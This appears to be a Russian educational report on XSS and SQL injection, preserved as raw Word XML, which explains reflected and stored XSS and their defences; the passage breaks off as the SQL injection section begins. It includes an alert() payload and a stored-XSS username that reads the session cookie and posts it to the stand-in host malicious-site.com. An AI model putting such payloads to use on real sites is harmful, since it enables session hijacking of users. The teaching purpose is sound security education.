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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ошибки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вводимых</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">данных:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">межсайтовый</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">скриптинг</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">веб-приложениях,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">межсайтовый</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">скриптинг</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">при</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">наличии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL-инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Косолапов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Степан</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Эдуардович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Межсайтовый скриптинг (Cross-Site Scripting или XSS) и SQL-инъекции являются двумя самыми распространенными видами атак на веб-ресурсы. Для эффективной защиты от таких атак необходимо ясно понимать, что они из себя представляют.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Межсайтовый скриптинг, или XSS, это метод атаки, при котором злоумышленник внедряет вредоносный код в доверенный сайт, который затем выполняется в браузере пользователя. Обычно это происходит, когда сайт позволяет пользователям добавлять свой собственный HTML-код, который впоследствии не фильтруется и может содержать скрипты. Эти скрипты могут потенциально украсть сессионные cookies, обмануть пользователя от имени сайта, а также перенаправить пользователя на вредоносные веб-страницы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С другой стороны, SQL-инъекция – это вектор атаки, который использует неправильно составленные SQL-запросы для манипуляции или раскрытия данных. Злоумышленник может внедрить вредоносные SQL-команды в пользовательский ввод, который затем исполняется бызом данных. Такие атаки позволяют злоумышленникам получить несанкционированный доступ к данным, который может включать в себя конфиденциальную информацию, такую как пароли, номера кредитных карт и личные данные пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эти атаки представляют серьезную угрозу для безопасности веб-сайтов и их пользователей. Для предотвращения SQL-инъекций и межсайтового скриптинга, разработчики должны придерживаться лучших практик безопасного программирования, включая проверку и фильтрацию пользовательского ввода, использование параметризованных запросов и применение принципа наименьших привилегий при обработке данных.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="32" w:name="xs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XSS</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="X26cb2b39242f274bab879d8420d6b3239bf96f9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Типы межсайтового скриптинга: отражённый, хранимый.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Наиболее распространенными видами межсайтового скриптинга являются отражённый, хранимый.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Отражающийся межсайтовый скриптинг, как правило, использует измененный URL, который включает в себя злонамеренный скрипт. Например, злоумышленник может отправить цели phish-сообщение с этим URL. Когда пользователь кликает на URL, злонамеренный код внедряется в ответ веб-сайта на запрос, что может привести к различным видам атак, таким как кража личных данных пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С другой стороны, хранимый межсайтовый скриптинг включает хранение злонамеренного кода на сервере. Затем этот код можно использовать для атаки на любого посетителя сайта. Хранимый межсайтовый скриптинг обычно происходит из-за недостаточно строгой проверки входных данных. Это делает его особенно опасным, так как он может затронуть большее количество пользователей.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="23" w:name="отражённый-xs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Отражённый XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Один из самых частых видов XSS атак.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1533811"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="схема отражённого XSS" title="" id="1" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="../img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отражённого XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Суть данной атаки - рассчитывать на то, что параметры из URL будут обработаны сайтом неверно и произойдет исполнение скрипта, который был заранее заложен в URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Приведем простой пример такой атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Предположим мы имеем строку поиска на нашем сайте и содержимое поисковой строки записывается/берется из какого-то get параметра URL, пусть он называется query.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Стандартный URL на странице поиска нашего сайта выглядит вот так:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.example.org/?query=картинки%20котов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Переходя по этой странице мы получаем в ответ вот такой HTML:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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"query"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Результаты поиска по запросу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span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"queryText"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картинки котов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/span&gt;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"result"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результаты поиска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...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В данном случае никакой атаки не случилось.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но что будет если мы передадим в параметре query какую-нибудь html разметку?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.example.org/?query=картинки%20котов&lt;script&gt;alert('Случилась xss атака! Экранируйте html разметку, пожалуйста..')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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"query"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Результаты поиска по запросу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&lt;span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"queryText"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картинки котов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&lt;script&gt;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'Случилась xss атака! Экранируйте html разметку, пожалуйста..'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&lt;/script&gt;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&lt;/span&gt;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"result"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результаты поиска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...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При таком html браузер выполнит скрипт, который был вставлен и если бы мы передали в get параметр query что-то страшное, то смогли бы украсть какие-то данные пользователя, или сделать какие-то действия от лица пользователя(с использованием его авторизационных кук, например).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="25" w:name="хранимый-xs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Хранимый XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Хранимый вид XSS очень похож по принципу действия на отражённый XSS. Разница лишь в том, что хранимый XSS происходит, когда один пользователь вводит зловредные данные, которые сохраняются на сервере и оттуда попадают на страницу другого пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1783916"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="схема хранимого XSS" title="" id="1" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="../img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хранимого XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рассмотрим ещё один пример и разберёмся, как выглядит внедрение XSS изнутри. Представим, что вы разрабатываете какой-нибудь форум любителей аквариумных рыбок. Пусть схематично его разметка выглядит так:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Здравствуйте, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span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"username"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Обычный Пользователь</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/span&gt;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&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;article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"topic"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"topic-header"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Разведение пираний в домашних условиях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&lt;/header&gt;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"topic-body"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Всем привет. Я решил завести себе пираний.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Расскажите, какие плюсы, минусы, подводные камни.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&lt;footer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"posted-by"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От </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span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"poster-name"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Другой Пользователь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&lt;/footer&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Простая разметка — ничего необычного. Один из пользователей, который создал эту тему для обсуждения выбрал при регистрации необычное имя. Вот такое:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Другой пользователь&lt;/span&gt;&lt;script&gt;const username=document.querySelector('.username').textContent;const sessionCookie=document.cookie.match(/session-token=([^;$]+)/)[1];fetch('http:/www.malicious-site.com',{method: 'post',body:JSON.stringify({username,sessionCookie})});&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Что произойдёт, если другой участник обсуждения просмотрит эту тему? Разметка страницы начнёт выглядеть следующим образом (отформатировано для читабельности):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Здравствуйте, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span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"username"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Обычный Пользователь</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/span&gt;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&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;article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"topic"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"topic-header"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Разведение пираний в домашних условиях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&lt;/header&gt;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"topic-body"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Всем привет. Я решил завести себе пираний.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Расскажите, какие плюсы, минусы, подводные камни.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&lt;footer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"posted-by"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От </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span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"poster-name"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Другой Пользователь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&lt;script&gt;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`.username`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textContent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sessionCookie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cookie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/session-token=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">([^;$]+)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`http:/www.malicious-site.com`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`post`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sessionCookie})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&lt;/script&gt;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&lt;/footer&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Визуально на странице ничего не изменится. Всё то же безумное объявление, но это лишь на первый взгляд. Экзотичное имя пользователя (то самое с кодом) содержало закрывающий тег</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/span&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Выходит, что на этом описание элемента с именем пользователя заканчивается. За ним следует тег</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">c JavaScript кодом, который браузер вынужден исполнить.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выполнение этого кода приведёт к отправке идентификатора сессии на сервер злоумышленника (www.malicious-site.com). Получив идентификатор, злоумышленник сможет подставить его себе и войти в сервис от имени пользователя. Дальше можно изменить профиль (если сервис позволяет это сделать без ввода пароля) и сделать другие деструктивные действия.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="последствия-xs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Последствия XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS атаки могут привести к ряду серьезных последствий:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Кража личных данных: Атакующий может использовать XSS атаку для получения доступа к личным и конфиденциальным данным пользователя, таким как имена пользователя, пароли, номера кредитных карт и другие персональные данные.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Манипулирование пользовательским интерфейсом: С помощью XSS атаки злоумышленник может внести изменения в веб-страницу таким образом, что пользователи будут убеждены предоставить свои личные данные или информацию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выполнение произвольного кода: XSS атаки позволяют злоумышленникам выполнять произвольный код в браузере жертвы, который может быть использован для различных вредоносных целей, включая установку вредоносного ПО, проведение фишинговых атак и т. д.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сессионная кража: Атакующий может использовать XSS для кражи куки-файлов пользователя, что может привести к краже сессии. Это означает, что злоумышленник может аутентифицироваться как жертва без необходимости вводить имя пользователя и пароль.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разрушение репутации и потеря доверия: Если веб-сайт становится жертвой XSS атак, это может повредить его репутацию и вызвать потерю доверия со стороны пользователей и клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Юридические проблемы: Владельцы веб-сайтов, которые уязвимы к XSS атакам, могут столкнуться с юридическими проблемами, включая нарушение законов о конфиденциальности и обязательств об обеспечении безопасности данных.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="31" w:name="как-бороться-с-xss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Как бороться с XSS</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="кодирование-данных-escape-user-input"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SectionNumber"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Кодирование данных (Escape user input)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это самый важный и основной способ предотвращения XSS-атак. Суть состоит в преобразовании символов, которые имеют специальное значение в HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Пример на JS: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userContent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"&lt;script&gt;alert('xss');&lt;/script&gt;"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safeContent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escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userContent)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В этом примере функция</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">escape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">преобразует специальные символы в их HTML кодировки, предотвращая их исполнение браузером.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="X6eb5437c8e7f7f0afe9a2239bfc7dd6ef32b06f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SectionNumber"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Использование Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CSP - это меры безопасности, которые помогают предотвратить XSS-атаки, ограничивая и указывая источники, которые можно загрузить на веб-странице.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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http-equiv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"Content-Security-Policy"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"default-src 'self'; script-src 'self'"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В этом примере CSP ограничивает загрузку скриптов только из источника</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">self</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что означает, что только те скрипты, которые расположены на том же источнике, что и веб-страница, могут быть загружены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сюда же относится nonce.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crypto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"crypto"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crypto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randomBytes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"base64"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'8IBTHwOdqNKAWeKl7plt8g=='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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nonce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"8IBTHwOdqNKAWeKl7plt8g=="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…</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy: script-src 'nonce-8IBTHwOdqNKAWeKl7plt8g=='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В данном случае мы разрешаем выполнение только конкретным inline скриптам, для которых прописан атрибут nonce совпадающий с тем, который мы передаем в CSP.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="валидация-вводаvalidation-sanitization"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SectionNumber"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Валидация ввода(Validation Sanitization)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это еще один основной способ предотвращения XSS-атак, заключающийся в ревью и очистке полученных данных.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Пример на JS: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userContent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"&lt;script&gt;alert('xss');&lt;/script&gt;"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safeContent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userContent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/&lt;script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[^&gt;]*?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">script&gt;/gi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В этом примере функция</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">replace()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">используется для удаления всех скриптов из введенных пользователем данных.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="использование-http-заголовков"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SectionNumber"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Использование HTTP заголовков</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Заголовки HTTP могут быть использованы для усиления безопасности вашего приложения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-XSS-Protection: 1; mode=block</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Этот заголовок используется для включения встроенного фильтра XSS в браузере.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="36" w:name="sql---инъекци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SQL - инъекции</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="33" w:name="схема-работы-sql---инъекци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Схема работы SQL - инъекции</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL-инъекция - это распространенный метод атаки на веб-сайты, использующий уязвимости в обработке запросов к базе данных. SQL инъекция - это вставка или</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">инъекция</w:t>
